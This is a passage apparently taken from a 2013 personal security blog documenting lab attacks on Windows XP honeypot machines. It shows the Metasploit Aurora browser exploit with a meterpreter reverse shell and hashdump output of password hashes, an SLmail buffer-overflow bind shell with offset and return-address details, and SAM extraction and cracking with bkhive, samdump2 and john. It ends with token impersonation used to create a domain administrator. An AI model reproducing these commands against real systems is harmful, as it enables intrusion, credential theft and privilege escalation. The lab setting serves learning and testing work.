Page File Location(s): C:\pagefile.sys
Domain: hp.local
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: Q147222
[02]: SP1 - SP
[03]: KB914961 - Service Pack
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.135

C:\WINDOWS\system32>

Test 1 succesfull

Test 2
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit

On the Linux machine I start a http server with evil page (https://192.168.34.132:8080/evil) using Metasploit:

Module options (exploit/windows/browser/ms10_002_aurora):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH /evil no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.34.132 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.34.132:4444
[*] Using URL: https://0.0.0.0:8080/evil
[*] Local IP: https://192.168.34.132:8080/evil
msf exploit(ms10_002_aurora) > [*] Server started.
...
...

Now in the target machine I start Internet Explorer 6, browse to the evil page and the msf consolle continues:

...
...
[*] 192.168.34.134 ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.34.134
[*] Meterpreter session 1 opened (192.168.34.132:4444 -> 192.168.34.134:1145) at 2013-06-18 17:00:56 +0200

msf exploit(ms10_002_aurora) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 HP-CLI01\user @ HP-CLI01 192.168.34.132:4444 -> 192.168.34.134:1145 (192.168.34.134)

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : HP-CLI01
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5d193c1fc3224fbbbc410375cbf57593:cb30aaad8dc109ef9521bfa868237ee3:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9fc1f511ad19c511fd4e162ca71fd236:::
user:1003:22124ea690b83bfbaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::

meterpreter > shell
Process 220 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name: HP-CLI01
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: honeypot
Registered Organization: honeypot
Product ID: 76487-640-1479176-23404
Original Install Date: 1/23/2013, 11:06:09 AM
System Up Time: 0 Days, 0 Hours, 9 Minutes, 4 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3465 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory: 511 MB
Available Physical Memory: 38 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\HP-CLI01
Hotfix(s): 5 Hotfix(s) Installed.
[01]: File 1
[02]: File 1
[03]: Q147222
[04]: KB942288-v3 - Update
[05]: KB954550-v5 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.134

C:\Documents and Settings\user\Desktop>

Test 2 succesfull

Test 3
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit

Take a look at the target machine:

C:\Documents and Settings\user>ipconfig | findstr Address
IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Documents and Settings\user>hostname
hp-cli01

C:\Documents and Settings\user>netstat /na | findstr LISTENING
TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
TCP 0.0.0.0:79 0.0.0.0:0 LISTENING
TCP 0.0.0.0:106 0.0.0.0:0 LISTENING
TCP 0.0.0.0:110 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:180 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8376 0.0.0.0:0 LISTENING
TCP 192.168.34.134:139 0.0.0.0:0 LISTENING

Now, let’s run the exploit from the attacker machine and re-run netstat

C:\Documents and Settings\user>netstat /na | findstr LISTENING
TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
TCP 0.0.0.0:79 0.0.0.0:0 LISTENING
TCP 0.0.0.0:106 0.0.0.0:0 LISTENING
TCP 0.0.0.0:110 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:180 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8376 0.0.0.0:0 LISTENING
TCP 192.168.34.134:139 0.0.0.0:0 LISTENING

The payload of the exploit was a bind shell on port 4444, indeed a TCP listener is now working this port.
On the Linux machine I am able to connect to this listener a get a remore shell:

root@bt:~# nc -v 192.168.34.134 4444
192.168.34.134: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.34.134] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>systeminfo
systeminfo

Host Name: HP-CLI01
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: honeypot
Registered Organization: honeypot
Product ID: 76487-640-1479176-23404
Original Install Date: 1/23/2013, 11:06:09 AM
System Up Time: 0 Days, 0 Hours, 32 Minutes, 0 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory: 511 MB
Available Physical Memory: 299 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: File 1
[02]: File 1
[03]: Q147222
[04]: KB942288-v3 - Update
[05]: KB954550-v5 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.134

C:\Program Files\SLmail\System>

The following screenshot is the exploit in acrion:

Image 1

Let’s go back of some steps and debug the exploit and look at image 2.

Image 2

The EIP is overwritten after 4654 bytes of space (\x41 ASCII A) and, in the 4 bytes of the EIP (\x42 ASCII B), I will put the return address ‘\x53\x93\x42\x7E’ that will point to exact space address of user32.dll. This will surelly work only under the same OS version (every Windows XP sp3 eng); that is where the user32.dll version and address space is the same.
If I understend how EMET works, it will often change the spece address of user32.dll de facto invalidating the exploit. Or better causing the application crash.

[end of phase 1] Take a look at the [phase 2]

SAM dump and Windows password decrypt.

Peru — Tue, 18 Jun 2013 13:29:06 +0000

The Windows passwords are stored and crypted in the SAM file (c:\windows\system32\config\). In the same folder you can find the key to decrypt it: the file SYSTEM. This two files are locked by the kernel when the operating system is up, so to backup it and decrypt you have to use some bootable linux distro, to mount the disk when the system is down or to use some program like fgdump, pwdump or meterpreter hashdump. Someone told me even that is possible to copy this files causing a Blue Sceen of Death an then remotely dump files, but I never try it.

An alternative, when the operating system is working, is to take the two twins files present in folder c:\windows\repair\ that the system create as a backup. This work up to Windows XP (think also Vista), but I can’t be able to find these files on Windows7. If you know something more, write me.

Once you have the files you use bkhive to extract the bootkey:

bkhive /mnt/ntfs/Windows/System32/config/SYSTEM /tmp/bootkey

Then put together the bootkey and the SAM file:

samdump2 /mnt/ntfs/Windows/System32/config/SAM /tmp/bootkey > /tmp/hash.txt

And then try to crack the hash:

john --format=NT /tmp/hash.txt

This is just an exemple of use of this tools. To crack hash you can algo use google that is always the bigest resource.

Create a domain user admin through an exploited PC

Peru — Tue, 07 May 2013 17:35:10 +0000

The server and pc hardening is the process of securing a system, limiting the surface that can be attacked. One of its role is to limitate the use of amministrative right.
Nowadays users have to use an unprivileged accounts, also sysadmins have to remind this role when configuring service and scripts.
Sometimes, to let centralized software to work correctly, sysadmins install client agents to work with high privileged account and this can be used to scalate privileges.
This is how to create a domain user admin through an exploited domain PC with local machine administration rights.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a Meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process –> meterpreter > ps
Load incognito extension –> meterpreter > use incognito
Listing available tokens –> meterpreter > list_tokens -u
Impersonate token –> meterpreter > impersonate_token
Get a command shell using the token –> meterpreter > execute -f cmd.exe -i -t -H -c
Add a domain User –> C:\WINDOWS\system32>net user USER PASSWORD /add /domain
Add the creted user in domain admin –> C:\WINDOWS\system32>net localgroup administrators USER /add /domain

Interact with session 1 and list process:

msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
1736 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
1788 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1812 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1856 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1868 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
2032 ibmpmsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ibmpmsvc.exe
176 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
312 svchost.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\svchost.exe
404 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
508 EvtEng.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
604 S24EvMon.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
824 svchost.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\svchost.exe
848 svchost.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\system32\svchost.exe
1228 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1304 svchost.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\system32\svchost.exe
1344 AcPrfMgrSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
1416 btwdins.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
1484 RegSrvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
1676 TpKmpSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\TpKmpSVC.exe
180 AcSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
700 MOMService.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
224 wmiprvse.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\wbem\wmiprvse.exe
948 SvcGuiHlpr.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
2580 alg.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\System32\alg.exe
3276 explorer.exe x86 0 LAB\utente1 C:\WINDOWS\Explorer.EXE
3908 tp4mon.exe x86 0 LAB\utente1 C:\WINDOWS\system32\tp4mon.exe
1112 igfxtray.exe x86 0 LAB\utente1 C:\WINDOWS\system32\igfxtray.exe
1124 hkcmd.exe x86 0 LAB\utente1 C:\WINDOWS\system32\hkcmd.exe
2192 igfxpers.exe x86 0 LAB\utente1 C:\WINDOWS\system32\igfxpers.exe
1860 ACTray.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
2596 ACWLIcon.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
2700 smax4pnp.exe x86 0 LAB\utente1 C:\Programmi\Analog Devices\Core\smax4pnp.exe
2904 ctfmon.exe x86 0 LAB\utente1 C:\WINDOWS\system32\ctfmon.exe
3076 BTTray.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
3572 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
2912 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
1472 rundll32.exe x86 0 LAB\admin C:\WINDOWS\system32\rundll32.exe <---------- Look at these
1256 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
3044 msiexec.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe
3224 rundll32.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\rundll32.exe

Load extension, list token and impersonate domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin <---------- Double backslash DOMAIN\\name
[+] Delegation token available
[+] Successfully impersonated user LAB\admin

meterpreter > getuid
Server username: lab\admin

Get a domain admin shell:

meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Create new domain user and join to the domain admins group:

C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

Obviously the victim PC is an Italian version, “esecuzione comando riuscita” means “Command completed successfully”